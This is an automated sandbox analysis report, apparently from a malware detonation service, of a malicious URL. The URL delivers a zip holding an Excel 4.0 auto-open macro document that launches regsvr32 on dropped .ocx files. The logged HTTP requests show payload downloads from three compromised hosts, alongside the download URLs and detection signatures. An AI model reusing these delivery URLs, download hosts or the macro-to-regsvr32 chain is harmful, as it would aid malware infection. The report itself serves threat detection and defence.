Windows Analysis Report http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201

Overview

General Information

Sample URL: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201
Analysis ID: 528463
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Yara detected hidden Macro 4.0 in Excel
Found inlined nop instructions (likely shell or obfuscated code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)

Classification

Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 108.179.253.213:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.53.42.241:443 -> 192.168.2.3:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.4.29.152:443 -> 192.168.2.3:49783 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 4x nop then jmp 04EB09B7h 6_2_04EB02A8
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 4x nop then jmp 04EB09B6h 6_2_04EB02A8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveX-Powered-By: PHP/7.1.33Set-Cookie: PHPSESSID=f287e90eb7e9bd7e2607d5e6083193ef; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Type: text/html; charset=UTF-8Content-Length: 175Content-Encoding: gzipVary: Accept-EncodingDate: Thu, 25 Nov 2021 09:45:35 GMTServer: LiteSpeedX-Content-Type-Options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 8e bd 0e 82 30 14 46 5f a5 e9 52 18 68 11 a3 0e 96 26 9a 38 f8 04 ce a5 6d e4 06 fa 93 72 21 c1 a7 37 a0 db c9 37 9c ef c8 1e fd a8 64 17 ed aa a4 85 85 80 6d 69 18 28 b1 58 85 a1 a5 42 4f c9 65 88 d9 4d ba 13 26 06 74 3e c5 ac f3 5a 35 c7 73 dd 9c 2e f5 81 7f 20 51 25 85 85 45 c9 c9 64 48 a8 c6 68 34 42 0c 3c 69 ec 83 f6 8e b4 c4 46 33 7b 17 90 bf 1d 3e 46 b7 e1 7d 7d da 82 85 81 95 db 78 43 cc d0 cd e8 0a b6 df b3 f2 2a c5 5f 28 c5 af 51 ec c1 2f 0d c8 39 ff 02 5f 89 0e 45 be 00 00 00 Data Ascii: -0F_Rh&8mr!77dmi(XBOeM&t>Z5s. Q%EdHh4B<iF3{>F}}xC*_(Q/9_E
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: angular.js.1.dr String found in binary or memory: http://angularjs.org
Source: angular.js.1.dr String found in binary or memory: http://errors.angularjs.org/1.6.4-local
Source: pnacl_public_x86_64_pnacl_sz_nexe.1.dr, pnacl_public_x86_64_pnacl_llc_nexe.1.dr String found in binary or memory: http://llvm.org/):
Source: mirroring_hangouts.js.1.dr String found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: mirroring_hangouts.js.1.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: data_1.4.dr, 000003.log2.1.dr, rerumvel-6647201.zip_Zone.Identifier.5.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/contemporary-236025701.zip
Source: History.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/contemporary-236025701.zipK
Source: data_1.4.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/contemporary-236025701.zipL
Source: Current Session.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201
Source: History.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201/07
Source: History Provider Cache.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-66472012
Source: History Provider Cache.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-66472012:
Source: Current Session.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-66472018
Source: History.1.dr String found in binary or memory: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201http://www.artforlife.lozhkin.
Source: mirroring_hangouts.js.1.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: mirroring_hangouts.js.1.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: manifest.json0.1.dr, 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.1.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: manifest.json0.1.dr, 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://apis.google.com
Source: mirroring_common.js.1.dr String found in binary or memory: https://apis.google.com/js/client.js
Source: mirroring_common.js.1.dr String found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
Source: pnacl_public_x86_64_libcrt_platform_a.1.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libcrt_platform_a.1.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://clients2.google.com
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://clients2.google.com/cr/report
Source: manifest.json0.1.dr, manifest.json.1.dr, manifest.json1.1.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://clients6.google.com
Source: pnacl_public_x86_64_ld_nexe.1.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.1.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: manifest.json0.1.dr String found in binary or memory: https://content.googleapis.com
Source: common.js.1.dr, mirroring_cast_streaming.js.1.dr String found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: d07f6d12-c956-435a-889c-062e1247057e.tmp.4.dr, 602605cd-a010-447a-97a4-267db34edb97.tmp.4.dr, 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://dns.google
Source: mirroring_common.js.1.dr String found in binary or memory: https://docs.google.com
Source: manifest.json0.1.dr String found in binary or memory: https://feedback.googleusercontent.com
Source: eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://fonts.googleapis.com
Source: manifest.json0.1.dr String found in binary or memory: https://fonts.googleapis.com;
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://fonts.gstatic.com
Source: manifest.json0.1.dr String found in binary or memory: https://fonts.gstatic.com;
Source: angular.js.1.dr, material_css_min.css.1.dr String found in binary or memory: https://github.com/angular/material
Source: craw_background.js.1.dr, craw_window.js.1.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://hangouts.clients6.google.com
Source: manifest.json0.1.dr String found in binary or memory: https://hangouts.google.com/
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: mirroring_common.js.1.dr String found in binary or memory: https://meet.google.com
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://meetings.clients6.google.com
Source: mirroring_common.js.1.dr String found in binary or memory: https://networktraversal.googleapis.com/v1alpha
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://ogs.google.com
Source: manifest.json.1.dr, craw_window.js.1.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://play.google.com
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr String found in binary or memory: https://r2---sn-4g5ednse.gvt1.com
Source: data_3.4.dr String found in binary or memory: https://r2---sn-4g5ednse.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic?cms_redirect=yes&mh=I2&mip=84.17
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr String found in binary or memory: https://redirector.gvt1.com
Source: data_1.4.dr String found in binary or memory: https://redirector.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic
Source: manifest.json.1.dr, craw_window.js.1.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://ssl.gstatic.com
Source: messages.json27.1.dr, messages.json83.1.dr, messages.json19.1.dr, feedback.html.1.dr, messages.json80.1.dr, messages.json28.1.dr, messages.json72.1.dr, messages.json22.1.dr, messages.json73.1.dr, messages.json37.1.dr, messages.json77.1.dr, messages.json17.1.dr, messages.json29.1.dr, messages.json21.1.dr, messages.json61.1.dr, messages.json74.1.dr, messages.json60.1.dr, messages.json75.1.dr, messages.json85.1.dr, messages.json20.1.dr, messages.json38.1.dr, messages.json4.1.dr, messages.json87.1.dr, messages.json86.1.dr, messages.json76.1.dr, messages.json69.1.dr, messages.json18.1.dr, messages.json39.1.dr, messages.json15.1.dr, messages.json84.1.dr, messages.json49.1.dr, messages.json70.1.dr, messages.json46.1.dr, messages.json26.1.dr, messages.json68.1.dr, messages.json47.1.dr, messages.json12.1.dr, messages.json79.1.dr, messages.json59.1.dr, messages.json45.1.dr, messages.json71.1.dr, messages.json82.1.dr, messages.json36.1.dr, messages.json81.1.dr, messages.json78.1.dr, messages.json67.1.dr, messages.json11.1.dr, messages.json16.1.dr, messages.json.1.dr String found in binary or memory: https://support.google.com/chromecast/answer/2998456
Source: messages.json27.1.dr, messages.json83.1.dr, messages.json19.1.dr, feedback.html.1.dr, messages.json80.1.dr, messages.json28.1.dr, messages.json72.1.dr, messages.json22.1.dr, messages.json73.1.dr, messages.json37.1.dr, messages.json77.1.dr, messages.json17.1.dr, messages.json29.1.dr, messages.json21.1.dr, messages.json61.1.dr, messages.json74.1.dr, messages.json60.1.dr, messages.json75.1.dr, messages.json85.1.dr, messages.json20.1.dr, messages.json38.1.dr, messages.json4.1.dr, messages.json87.1.dr, messages.json86.1.dr, messages.json76.1.dr, messages.json69.1.dr, messages.json18.1.dr, messages.json39.1.dr, messages.json15.1.dr, messages.json84.1.dr, messages.json49.1.dr, messages.json70.1.dr, messages.json46.1.dr, messages.json26.1.dr, messages.json68.1.dr, messages.json47.1.dr, messages.json12.1.dr, messages.json79.1.dr, messages.json59.1.dr, messages.json45.1.dr, messages.json71.1.dr, messages.json82.1.dr, messages.json36.1.dr, messages.json81.1.dr, messages.json78.1.dr, messages.json67.1.dr, messages.json11.1.dr, messages.json16.1.dr, messages.json.1.dr String found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
Source: craw_background.js.1.dr, craw_window.js.1.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: manifest.json0.1.dr, 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://www.google.com
Source: manifest.json.1.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.1.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.1.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.1.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.1.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.1.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: mirroring_hangouts.js.1.dr String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: feedback_script.js.1.dr String found in binary or memory: https://www.google.com/tools/feedback
Source: manifest.json0.1.dr String found in binary or memory: https://www.google.com;
Source: craw_background.js.1.dr, 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, craw_window.js.1.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.1.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: manifest.json.1.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.1.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: manifest.json.1.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.1.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: manifest.json0.1.dr String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: mirroring_common.js.1.dr String found in binary or memory: https://www.googleapis.com/calendar/v3
Source: mirroring_common.js.1.dr String found in binary or memory: https://www.googleapis.com/hangouts/v1
Source: 81a9ac02-601b-435d-be4d-21e0784ce8f2.tmp.4.dr, eb61acc6-0a83-4200-9689-2066e6f2ca5b.tmp.4.dr String found in binary or memory: https://www.gstatic.com
Source: common.js.1.dr String found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
Source: manifest.json0.1.dr String found in binary or memory: https://www.gstatic.com;
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /aQ6mO5EsFPz/yh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: magnascakes.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oqxIAZfo56z/yh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sherwinclothing.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utGI12nl/yh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: microtechzambia.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /asperioresab/rerumvel-6647201 HTTP/1.1Host: www.artforlife.lozhkin.foundationConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /asperioresab/contemporary-236025701.zip HTTP/1.1Host: www.artforlife.lozhkin.foundationConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=f287e90eb7e9bd7e2607d5e6083193ef
Source: unknown HTTPS traffic detected: 108.179.253.213:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.53.42.241:443 -> 192.168.2.3:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.4.29.152:443 -> 192.168.2.3:49783 version: TLS 1.2

System Summary:

barindex
Yara signature match
Source: C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu\favor-2069844189.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_04EB02A8 6_2_04EB02A8
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_04EB0298 6_2_04EB0298
Source: C:\Windows\SysWOW64\unarchiver.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "http://www.artforlife.lozhkin.foundation/asperioresab/rerumvel-6647201
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,14176787574664726196,1403337882875848993,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1912 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1604,14176787574664726196,1403337882875848993,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=4640 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\rerumvel-6647201.zip
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu" "C:\Users\user\Downloads\rerumvel-6647201.zip
Source: C:\Windows\SysWOW64\7za.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu\favor-2069844189.xls
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,14176787574664726196,1403337882875848993,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1912 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1604,14176787574664726196,1403337882875848993,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=4640 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\rerumvel-6647201.zip Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
